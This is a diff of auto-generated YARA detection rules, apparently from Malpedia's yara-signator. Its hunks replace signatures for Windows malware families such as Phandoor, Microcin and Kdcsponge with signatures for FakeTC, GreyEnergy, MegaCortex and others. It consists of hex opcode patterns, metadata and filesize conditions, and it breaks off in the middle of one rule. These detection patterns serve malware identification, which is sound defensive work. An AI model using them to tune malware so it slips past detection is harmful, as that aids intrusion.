-		id = "155e4267-136b-55b4-90bd-1c218e8670a7"
+		id = "20700f38-ca76-52c3-a2fd-e577561f7238"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phandoor_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.faketc_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "527334a4bd04f39c9bfefa050c6438c0d4a556c8a31f02edf88789f46c6d4efd"
+		logic_hash = "88cb80bbffbb5dd33ed57d116a0c91ab50887b3cc89797bc963aaa34348dde48"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134678,38 +134418,32 @@ rule MALPEDIA_Win_Phandoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b36 e8???????? 83c404 eb25 e8???????? }
-		$sequence_1 = { ffd6 833d????????00 a3???????? 0f8482000000 833d????????00 7479 833d????????00 }
-		$sequence_2 = { 83c418 803f53 755f 807f015e }
-		$sequence_3 = { 8bd8 c1eb08 8bd1 895df8 8bd9 c1ea08 }
-		$sequence_4 = { 22da 22d9 8bc8 c1e910 224df8 }
-		$sequence_5 = { 890d???????? 8b96bc010000 8915???????? 33ff 399e90010000 763b }
-		$sequence_6 = { e8???????? 8b1d???????? 50 ffd3 8bf8 3bfe 8b35???????? }
-		$sequence_7 = { 0f8438010000 833d????????00 0f842b010000 833d????????00 0f841e010000 833d????????00 0f8411010000 }
-		$sequence_8 = { 741c 8b0d???????? 68???????? 51 c705????????04000000 }
-		$sequence_9 = { 83c404 8bf7 85ff 75e6 5f c7430800000000 }
-		$sequence_10 = { 43 84c0 7409 8803 }
-		$sequence_11 = { 6a03 d1ea 8d85e8efffff e8???????? }
-		$sequence_12 = { 741c 56 8b35???????? 3acb 740e }
-		$sequence_13 = { 3acb 740e 50 ffd6 }
-		$sequence_14 = { 6a03 d1ea 8bc3 e8???????? 8bc8 85c9 }
-		$sequence_15 = { 57 68???????? 50 c705????????03000000 ffd6 8b0d???????? 33ff }
+		$sequence_0 = { e8???????? bd01000000 89ac2460010000 84db 7405 c644246c01 097c2470 }
+		$sequence_1 = { c645fc10 e8???????? 83bdd0fdffff08 720f 8b95bcfdffff 52 e8???????? }
+		$sequence_2 = { e8???????? 83c41c c3 8b4c2424 5f 5e 5d }
+		$sequence_3 = { 8b91f0860000 83c201 8b81f4860000 83d000 8b4d08 8991f0860000 8981f4860000 }
+		$sequence_4 = { e8???????? 83c40c 85c0 740f 8b45f8 c74048ffffffff e9???????? }
+		$sequence_5 = { e8???????? 50 8d85b8060000 50 c645fc0c e8???????? 83c40c }
+		$sequence_6 = { c1ef10 c1ed18 330cad18d45f00 81e7ff000000 2b0cbd18d85f00 8b7808 33f1 }
+		$sequence_7 = { e8???????? 83c40c c744241401000000 89742418 c744241c00000000 83fe08 0f87c2010000 }
+		$sequence_8 = { e8???????? a1???????? 33c4 89842450010000 53 55 8bac2460010000 }
+		$sequence_9 = { e8???????? 83c408 85c0 7473 8b4df0 8b91a8020000 8b45f0 }
 
 	condition:
-		7 of them and filesize < 2124800
+		7 of them and filesize < 6864896
 }
-rule MALPEDIA_Win_Moriya_Auto : FILE
+rule MALPEDIA_Win_Syscon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "59d11a0a-17d5-591e-bce9-2635239237cd"
+		id = "5a8ce706-db42-58e3-9d51-88fe0c5beb4f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moriya_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.syscon_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "502cc93b2e63f3afc69dfd0a7f0cef3fdb24356c38e271e56341bfbf7336c1de"
+		logic_hash = "e30c1d08a4b5a8899edc4bd6891355bf1333e55e03f2135a162795fd594797ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134723,34 +134457,40 @@ rule MALPEDIA_Win_Moriya_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4881c490000000 5b c3 4055 }
-		$sequence_1 = { 48833d????????00 7405 e8???????? 48833d????????00 7417 488d4dd0 ff15???????? }
-		$sequence_2 = { 488b9c2490000000 0f57c0 4d8bf0 488bea 0f1103 0f114310 48894320 }
-		$sequence_3 = { 66480f6ec2 0f16c0 0f1101 4c03c1 4883c110 4883e1f0 }
-		$sequence_4 = { 488945d8 488d442420 f30f7f45e4 c745e003500000 0f1005???????? }
-		$sequence_5 = { ff15???????? 488b0d???????? 488d842498000000 4889442430 33d2 48895c2428 }
-		$sequence_6 = { 488364243800 498bd8 488364245000 488bfa 488bf1 33d2 }
-		$sequence_7 = { 4881c490000000 5b c3 4055 53 56 57 }
-		$sequence_8 = { 4983f84f 7350 4d8bc8 4983e1f8 }
-		$sequence_9 = { 0f100d???????? 83a5a000000000 488d542460 488b0d???????? 4533c9 f30f7f45a0 }
+		$sequence_0 = { 33c4 898424d80b0000 53 56 }
+		$sequence_1 = { 47 83c604 897df8 80fb40 7412 8a55ff }
+		$sequence_2 = { 8d942414040000 68???????? 52 ff15???????? 83c40c 6a00 }
+		$sequence_3 = { 57 8bc6 e8???????? 83c408 56 }
+		$sequence_4 = { 68e8030000 ffd6 6a00 6a20 6a03 }
+		$sequence_5 = { a1???????? 68???????? 50 ff15???????? 85c0 0f846affffff }
+		$sequence_6 = { ff15???????? e9???????? 8b8c24e40b0000 5f }
+		$sequence_7 = { eb0c 53 68???????? ff15???????? 57 }
+		$sequence_8 = { 488d5590 488d0daa300000 448bc0 e8???????? 488d8d20040000 }
+		$sequence_9 = { e8???????? 488d0dab460000 ff15???????? 488d542420 488d0d99460000 }
+		$sequence_10 = { 498bcc ff15???????? 488bcf ff15???????? bf04010000 }
+		$sequence_11 = { 488d4c2440 448bc3 33d2 e8???????? 488d542440 b904010000 ff15???????? }
+		$sequence_12 = { 488d8d90050000 488d159e2f0000 ff15???????? 488d9590050000 488d8d60010000 e8???????? 488d8d60010000 }
+		$sequence_13 = { c705????????02000000 83f901 750a c705????????01000000 890d???????? 488b0d???????? 8915???????? }
+		$sequence_14 = { 488d0d07460000 448bc0 e8???????? 488d542420 }
+		$sequence_15 = { 89542420 4c8d442450 488d8d90050000 488d1514310000 }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 120832
 }
-rule MALPEDIA_Win_Dairy_Auto : FILE
+rule MALPEDIA_Win_Oldbait_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8a558663-9225-5d4f-bf21-2e09f40cb6bc"
+		id = "3d100a63-9903-54ef-879e-2f52e4e2c1c3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dairy_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oldbait_auto.yar#L1-L229"
 		license_url = "N/A"
-		logic_hash = "67b1fc4dc17bcf8b0cdf2ebf4577147bbf8e49b67379d73e95b1b4864059fa48"
+		logic_hash = "3c4b648b9be2acfeca2a30294d4a7ef92b56cb886b14af5b01f11170901c19b6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134762,34 +134502,48 @@ rule MALPEDIA_Win_Dairy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8bf2 57 81e607000080 7905 4e }
-		$sequence_1 = { 8d542410 8d442414 52 68ff030000 50 }
-		$sequence_2 = { 8bd1 83c9ff 50 f2ae 8bca }
-		$sequence_3 = { 8b44241c 57 8b3e ba2037efc6 8b08 8b4004 897c2418 }
-		$sequence_4 = { aa e8???????? 83c40c 83f8ff 0f8514ffffff e9???????? 6a10 }
-		$sequence_5 = { 7f3b ba27000000 2bd1 bf???????? 83c9ff }
-		$sequence_6 = { f2ae f7d1 2bf9 8d5c241c 8bf7 8be9 8bfb }
-		$sequence_7 = { c70701000000 e8???????? 83c404 894704 b801000000 5f 5e }
-		$sequence_8 = { f3a4 75cc 8d7c243c 83c9ff }
-		$sequence_9 = { 52 68???????? 50 e8???????? 83c410 85c0 7542 }
+		$sequence_0 = { 7409 43 83c104 83fb40 72f3 }
+		$sequence_1 = { 8b86f5b11800 8945cc 8b86fdb11800 8945bc }
+		$sequence_2 = { 05d4db1900 8945f4 ff35???????? ff75fc }
+		$sequence_3 = { 8d4b08 51 50 ff75e4 }
+		$sequence_4 = { 50 57 ff55e8 6800080000 ff750c }
+		$sequence_5 = { 3571281424 42 3bd6 894510 72da 8bc7 5f }
+		$sequence_6 = { 56 56 50 ff75ac }
+		$sequence_7 = { 6a00 6a01 6800000080 ff75f8 ff15???????? }
+		$sequence_8 = { 57 8b7d08 8d70ff 85f6 }
+		$sequence_9 = { 888800b01800 ebda 8b45fc 0531b11800 50 8b45f8 }
+		$sequence_10 = { 47 0504040000 83ff08 72f0 83ff08 0f83a6000000 }
+		$sequence_11 = { 6a40 6800300000 68d4fd1900 6a00 ff15???????? }
+		$sequence_12 = { 50 ff7508 ff55e0 ff7508 8d83fcf7ffff }
+		$sequence_13 = { 0f84d3010000 837d0800 0f84c9010000 837ddc0c 7518 }
+		$sequence_14 = { 7626 8b4510 8bca 83f101 83e107 d3e8 }
+		$sequence_15 = { 55 8bec 8b450c 56 33d2 57 8b7d08 }
+		$sequence_16 = { 8b45f8 301c07 41 47 3b4d10 }
+		$sequence_17 = { 50 8d45c4 50 68???????? ff35???????? ffd6 }
+		$sequence_18 = { ff55d8 8bd8 83fbff 752c 8d45c4 50 }
+		$sequence_19 = { 6a00 ff750c ff75fc ff55f0 }
+		$sequence_20 = { 6a64 50 6a01 6a00 }
+		$sequence_21 = { ffd6 ffd0 53 ff55e4 90 90 90 }
+		$sequence_22 = { 50 ff75e0 e8???????? 90 }
+		$sequence_23 = { 57 8d45ec 57 50 53 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Microcin_Auto : FILE
+rule MALPEDIA_Win_Grey_Energy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dddf9fba-fce1-5368-9223-75a8c16c13ed"
+		id = "286c9a55-9cf0-55bb-80e0-2e0f311ee2a1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.microcin_auto.yar#L1-L452"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grey_energy_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "ab06ef293989aa12cd44a7f8f720c88cb322c4fba8d50dd4025a69de4fec24e0"
+		logic_hash = "b914dfed1e2f2f24a40105da213346dd87b255cf1b7c608a5613862d55be27f8"
 		score = 75
-		quality = 44
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -134801,72 +134555,38 @@ rule MALPEDIA_Win_Microcin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7461401000000 4d8d8680000000 418900 4989b688000000 41c7868400000004000000 4533c9 }
-		$sequence_1 = { ff15???????? 488bcb 664489642438 488bf0 ff15???????? 0fb7cf }
-		$sequence_2 = { 897e04 5b 5f 5e 5d c20400 55 }
-		$sequence_3 = { 8d45ac 50 6801000080 ff15???????? }
-		$sequence_4 = { 85c0 7e18 80bc35a8feffff3a 741f 8d85a8feffff }
-		$sequence_5 = { ff15???????? 4863c8 c6840d8002000068 488d8d80020000 }
-		$sequence_6 = { 488b0d???????? ff15???????? 4885c0 742b 488b4018 }
-		$sequence_7 = { 4885c0 742b 488b4018 488b08 8b09 ff15???????? 488bf8 }
-		$sequence_8 = { 50 6805100000 68ffff0000 56 8b35???????? ffd6 }
-		$sequence_9 = { 8d85f8feffff 6804010000 50 ff15???????? 8d85f8feffff }
-		$sequence_10 = { ff15???????? 4863c8 807c0c5f5c 7413 488d4c2460 ff15???????? 4863c8 }
-		$sequence_11 = { ff15???????? 8b3d???????? 8d85e0feffff 50 }
-		$sequence_12 = { 33f6 50 ffd3 85c0 7e18 }
-		$sequence_13 = { 488b05???????? 4833c4 488985f0040000 4c8b3d???????? 4533c0 8bfa }
-		$sequence_14 = { 8b1d???????? 8d85a8feffff 50 ffd3 }
-		$sequence_15 = { 488b1d???????? 488903 48894308 488b0d???????? }
-		$sequence_16 = { 7647 498bcd e8???????? 4c8d05b7120100 41b903000000 488d4c45bc 488bc1 }
-		$sequence_17 = { 6828010000 8d85ccfeffff 6a00 50 }
-		$sequence_18 = { 488d0d950c0100 ff15???????? 4885c0 7419 }
-		$sequence_19 = { 7419 488d15730c0100 488bc8 ff15???????? }
-		$sequence_20 = { 7541 8b4df0 83c108 51 }
-		$sequence_21 = { 7370 696465726167656e 742e 657865 }
-		$sequence_22 = { 83ec08 894df8 c745fc00a40000 6a40 6800100000 }
-		$sequence_23 = { 53 53 56 43 }
-		$sequence_24 = { 498bd5 ff15???????? 418d7c24e7 85c0 752a 4c8d0502130100 8bd7 }
-		$sequence_25 = { 8b8c8d78feffff 890c90 ebc8 e9???????? 33c0 }
-		$sequence_26 = { c745f46d737664 c745ec5f6c6569 0fbe4dee 83c101 884dee c745f872742e64 }
-		$sequence_27 = { 8d8da0f4ffff e8???????? 8b8574dfffff 5e 8be5 }
-		$sequence_28 = { 8b4dfc 83c108 51 ff15???????? 8b4dfc }
-		$sequence_29 = { 4883ec20 8bd9 488d0d950c0100 ff15???????? }
-		$sequence_30 = { 8b4508 0fb608 81e107000080 7905 49 83c9f8 41 }
-		$sequence_31 = { e8???????? 85c0 751a 488d15f8110100 }
-		$sequence_32 = { e8???????? cc 4c8d056c120100 498bd4 488bcd }
-		$sequence_33 = { 83c208 52 ff15???????? 6a06 ff15???????? ebcd 8be5 }
-		$sequence_34 = { 726f 6e 6d 656e 7400 }
-		$sequence_35 = { fa fa fa fa fa }
-		$sequence_36 = { 4c8d0574130100 488bcd 418bd4 e8???????? 33c9 85c0 }
-		$sequence_37 = { 636373 7673 6873742e65 7865 }
-		$sequence_38 = { 660fd645ec 660fd645f4 3d89000000 0f87b2010000 0fb68030184000 ff2485d8174000 68???????? }
-		$sequence_39 = { 63f6 48 89d9 6a08 41 58 4f }
-		$sequence_40 = { 50 56 c785a4fcffff24020000 ff15???????? 85c0 7431 }
-		$sequence_41 = { 8d85f0feffff 6a00 50 e8???????? 83c408 8d95f0feffff }
-		$sequence_42 = { 680000cf00 68???????? 8d842480000000 50 6a00 ff15???????? }
-		$sequence_43 = { 68???????? e8???????? 8b7508 c7465cf8814000 }
-		$sequence_44 = { c785b4feffff00000000 ff15???????? 50 56 ff15???????? 85c0 7e0f }
-		$sequence_45 = { e8???????? 3d1f047008 754e 49 8b4d08 49 8b5510 }
-		$sequence_46 = { 7523 56 8d44245c 50 }
-		$sequence_47 = { 40 ebf8 55 8bec 8b450c }
-		$sequence_48 = { 8b4060 6a40 6800100000 680c200000 6a00 8945f8 }
-		$sequence_49 = { 7521 4c 89e1 33d2 41 b800800000 41 }
+		$sequence_0 = { 50 53 53 6800000008 57 }
+		$sequence_1 = { 6800000008 57 53 53 }
+		$sequence_2 = { 68???????? 8945cc e8???????? 68???????? 8945d4 }
+		$sequence_3 = { 8945d4 e8???????? 68???????? 8945d0 }
+		$sequence_4 = { 53 ff15???????? 8b75f8 85f6 }
+		$sequence_5 = { 8b45f8 0345ec 8808 eb10 }
+		$sequence_6 = { 8b45ec 8b55f8 66890c42 eb14 8b45ec 8b4df8 8b55f0 }
+		$sequence_7 = { 7507 33c0 e9???????? c745f004000000 }
+		$sequence_8 = { 8b4df8 8b55f0 8b7508 668b1456 66891441 }
+		$sequence_9 = { 8b4d08 0fb70c41 8b45f0 33d2 }
+		$sequence_10 = { 6a40 ff15???????? 8945f8 837df800 7507 33c0 }
+		$sequence_11 = { 8b4508 0345f0 0fbe08 8b45f0 }
+		$sequence_12 = { c60100 41 48 75f9 ff75f8 }
+		$sequence_13 = { ff5108 56 e9???????? 53 8d45cc 50 8d45c8 }
+		$sequence_14 = { 83ec18 57 33ff 897dfc 397d0c 0f86a5010000 }
+		$sequence_15 = { 51 e8???????? 85c0 0f84be000000 }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Kdcsponge_Auto : FILE
+rule MALPEDIA_Win_Unidentified_069_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "31a4aae6-c5e0-50ee-8647-19b734337847"
+		id = "afe1465e-cfb7-567e-8fc3-f22e1927c9fa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kdcsponge_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_069_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "797313fd55f6c292fca430846a21ff5b3c78f0f888b26a3429a3aef947194551"
+		logic_hash = "83336718c29f0a03822d261021a531779ab99e146839ff186b37823c6377f602"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134880,32 +134600,32 @@ rule MALPEDIA_Win_Kdcsponge_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80fa01 751c 80bbc204000000 7709 80bbbc0400000f 740a c783a004000002000000 }
-		$sequence_1 = { 41b800100000 488d442440 48894c2448 4889442428 488d0d3bdd0200 4c89742420 ff15???????? }
-		$sequence_2 = { 894364 0fb601 488bcb ff14c2 83bb7804000010 750c d1bb44040000 }
-		$sequence_3 = { 754d 83ba4404000020 7c0f c7826004000004000000 8d4804 eb0f c7826004000002000000 }
-		$sequence_4 = { 4883c8ff 807c030100 488d4001 75f5 448d4801 }
-		$sequence_5 = { 7514 4183b85004000004 750a 4180b8a604000000 740a 488d4201 488b5c2408 }
-		$sequence_6 = { 0fb64101 c1e806 898348040000 83f803 0f84d6000000 488d8b10010000 c7436000001900 }
-		$sequence_7 = { 4053 4883ec20 80b9c304000001 488bd9 0f853d010000 80b9b004000001 0f850a020000 }
-		$sequence_8 = { b800001100 b900001400 0f44c1 894360 7507 c683c504000005 488d8b10010000 }
-		$sequence_9 = { e9???????? 33d2 418bcd 448d4201 e8???????? 488b542440 4c8d1ddb420100 }
+		$sequence_0 = { 8d4564 e8???????? 84c0 747b 807d6802 7558 }
+		$sequence_1 = { 3975fc 0f824dffffff 5f 5b 8b450c 5e c9 }
+		$sequence_2 = { ff15???????? 8b7d08 8b37 e8???????? 83f8ff 0f84a8010000 8b0d???????? }
+		$sequence_3 = { 8b75f4 f6450804 741a 85f6 7616 8b7d0c 8d4477fe }
+		$sequence_4 = { 7fae ff36 885dff ff15???????? 59 8a45ff 5f }
+		$sequence_5 = { 8bda d1eb 23df 8b1c9da81d4000 81e3ffffff01 03c0 }
+		$sequence_6 = { c20400 8b462c 85c0 7638 83f820 7411 57 }
+		$sequence_7 = { 7505 895dd8 eb11 0fb7c0 03c7 50 83c8ff }
+		$sequence_8 = { e8???????? 8bf8 85ff 0f8e97000000 8bca e8???????? }
+		$sequence_9 = { ff15???????? 85c0 7419 6a00 68???????? 6a05 ba???????? }
 
 	condition:
-		7 of them and filesize < 720896
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Unidentified_118_Auto : FILE
+rule MALPEDIA_Win_Megacortex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4400b473-0fbc-528a-90a2-ec9f1b80742d"
+		id = "208deefe-8484-5fed-92e0-3f970a206260"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_118"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_118_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.megacortex_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "d467c02dd84dc6cead16168800c63f7f296242b2a484c5237404056a67dd88cf"
+		logic_hash = "8fabc9945f7f432c61dd2181155b450bb3827a4277be45dd2f60b6e5a7f065dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134919,32 +134639,32 @@ rule MALPEDIA_Win_Unidentified_118_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f57c0 c60300 41b820000000 0f1101 4883611000 488bd6 4883611800 }
-		$sequence_1 = { e8???????? 84c0 7409 488933 c6430800 eb79 48b8e1e1e1e1e1e1e101 }
-		$sequence_2 = { 84c0 740c 817c243000400000 7502 }
-		$sequence_3 = { 488bc3 488b4d07 4833cc e8???????? 4881c4b8000000 415f 415e }
-		$sequence_4 = { 488b49f8 482bc1 4883c0f8 4883f81f 7721 e8???????? 8bc3 }
-		$sequence_5 = { 7747 e8???????? 660f6f05???????? f30f7f4527 c6451700 807de700 7409 }
-		$sequence_6 = { 0f45fd 488bce e8???????? 488b4c2430 e8???????? }
-		$sequence_7 = { 488d4c2460 ffd2 90 e9???????? 0f57c0 0f1145f0 0f57c9 }
-		$sequence_8 = { e8???????? 4c8b4c2450 4c8bc3 488bd7 488bce }
-		$sequence_9 = { 488b49f8 482bc1 4883c0f8 4883f81f 0f87d8000000 e8???????? 483bfe }
+		$sequence_0 = { 0f843e040000 53 ff75e4 e8???????? 83c408 8945e0 85c0 }
+		$sequence_1 = { ff75c8 50 e8???????? 83c40c eb03 8b45c8 8b75b8 }
+		$sequence_2 = { f7db 1bdb 23d8 8b4304 83c304 2bde 8d50ff }
+		$sequence_3 = { 83c408 8d75fc 8b10 8d4aff f7d9 1bc9 }
+		$sequence_4 = { c3 8bc7 c745f801000000 8d4dec c745fc01000000 2bc1 8d7304 }
+		$sequence_5 = { f7da 1bd2 23d1 03d0 8d4d0c 2bf1 8d42ff }
+		$sequence_6 = { f6430401 c645ff01 7506 8b45e4 894308 807dff00 0f8422030000 }
+		$sequence_7 = { eb3a 83fb0b 7507 68???????? eb2e 83fb30 7507 }
+		$sequence_8 = { 8d45d0 50 e8???????? 8d75e8 8b10 8d4aff f7d9 }
+		$sequence_9 = { e8???????? 8d45b8 50 8d4e30 e8???????? 8b45d0 8d4d80 }
 
 	condition:
-		7 of them and filesize < 413696
+		7 of them and filesize < 1556480
 }
-rule MALPEDIA_Win_Typehash_Auto : FILE
+rule MALPEDIA_Win_Bibi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c0bfd3b-1920-5db4-be8f-16377880af07"
+		id = "c2df99bb-e2c1-5d6e-93f4-9c5f5dcb8fbb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.typehash_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bibi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bibi_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "cb4de3d61dde4ee402264a80e34744365587a3be274cf88c25ae82f2b1a1af55"
+		logic_hash = "3d7402c133784a89b3daa278c9e13f3e526d55f5078582b8c7ac35078977c2ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134958,32 +134678,32 @@ rule MALPEDIA_Win_Typehash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8380000000 8bc8 8bf0 c1f905 83e61f 8d3c8de03d4100 c1e603 }
-		$sequence_1 = { 8d7c246c 83c9ff 33c0 8d54246c f2ae f7d1 }
-		$sequence_2 = { 8b0c8de03d4100 8d04c1 eb05 b8???????? f6400480 0f8492000000 ff4e04 }
-		$sequence_3 = { 8b15???????? 8d4c2410 52 6800280000 }
-		$sequence_4 = { 50 c745c458e64000 e8???????? cc 56 ff742408 8bf1 }
-		$sequence_5 = { 5f eb26 8d4508 8db6742a4100 6a00 50 }
-		$sequence_6 = { c1f905 83e01f 8b0c8de03d4100 8d04c1 }
-		$sequence_7 = { 3bd7 770f e8???????? 8b442418 8b0d???????? 3bfb }
-		$sequence_8 = { 8d4c2440 c68424cc00000001 e8???????? 8b44241c 3d00280000 7312 }
-		$sequence_9 = { 03f8 897c2410 813f50450000 7413 68c1000000 }
+		$sequence_0 = { 0f840b010000 488d05a2af0100 4a8b04e8 42385cf838 0f8df5000000 e8???????? }
+		$sequence_1 = { 754a 483bc2 0f84cc000000 660f1f440000 4c8929 4c896910 4c896918 }
+		$sequence_2 = { 488b45bf 488b1cd0 488b5318 4883fa08 }
+		$sequence_3 = { 89442424 488b4c2420 48898b78020000 488bc3 4c8d5c2460 }
+		$sequence_4 = { 483bd9 7522 483bc1 7468 0f1f4000 0f1008 }
+		$sequence_5 = { 488d15645c0100 e8???????? 85c0 7416 }
+		$sequence_6 = { 7716 488bc6 4983f810 7203 488b06 48894e10 c6040800 }
+		$sequence_7 = { 0f84a1000000 b901000000 e8???????? 483bd8 7509 488d3d70c00100 eb16 }
+		$sequence_8 = { 6690 83fb0a 7d65 ba3d000000 e8???????? }
+		$sequence_9 = { 4c8d04c0 498b84d140310300 42f644c03848 7430 8a8c2480000000 4c8b942490000000 80f90a }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 462848
 }
-rule MALPEDIA_Win_Tclient_Auto : FILE
+rule MALPEDIA_Win_Lambert_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "650e8891-ed90-5136-bd2f-e9d9bc478c30"
+		id = "766677fc-20f5-5c4e-acc7-a5a40372da69"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tclient_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lambert_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "8cec1eb16073a2ac15195a2fb3f4612d56f52a89cef4787143a34f4035169950"
+		logic_hash = "60e780dd4c006048bc0528824ae1f73ab836d6b104a44501df20cceb325dce70"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134997,32 +134717,38 @@ rule MALPEDIA_Win_Tclient_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffb5f0fdffff ff95e4fdffff 8bf0 83c40c 85f6 0f85ec020000 8b85f0fdffff }
-		$sequence_1 = { 6a00 50 e8???????? 83c40c c70340000000 8bcb e8???????? }
-		$sequence_2 = { 8d4508 8bcc 50 e8???????? 8d4dcc 885dfc e8???????? }
-		$sequence_3 = { 0f8521feffff 837d1001 0f857a010000 85f6 745f 8b4e04 57 }
-		$sequence_4 = { ff7508 8bd7 8bce e8???????? 59 59 5f }
-		$sequence_5 = { 8bf1 57 84d2 756a b800020000 66858620030000 755c }
-		$sequence_6 = { 8d45c8 50 8d7730 56 8d5750 8d4de8 e8???????? }
-		$sequence_7 = { 8b049dc0a04700 0fb6440828 83e001 0f848d000000 b8ffffff7f 3b4510 1bc0 }
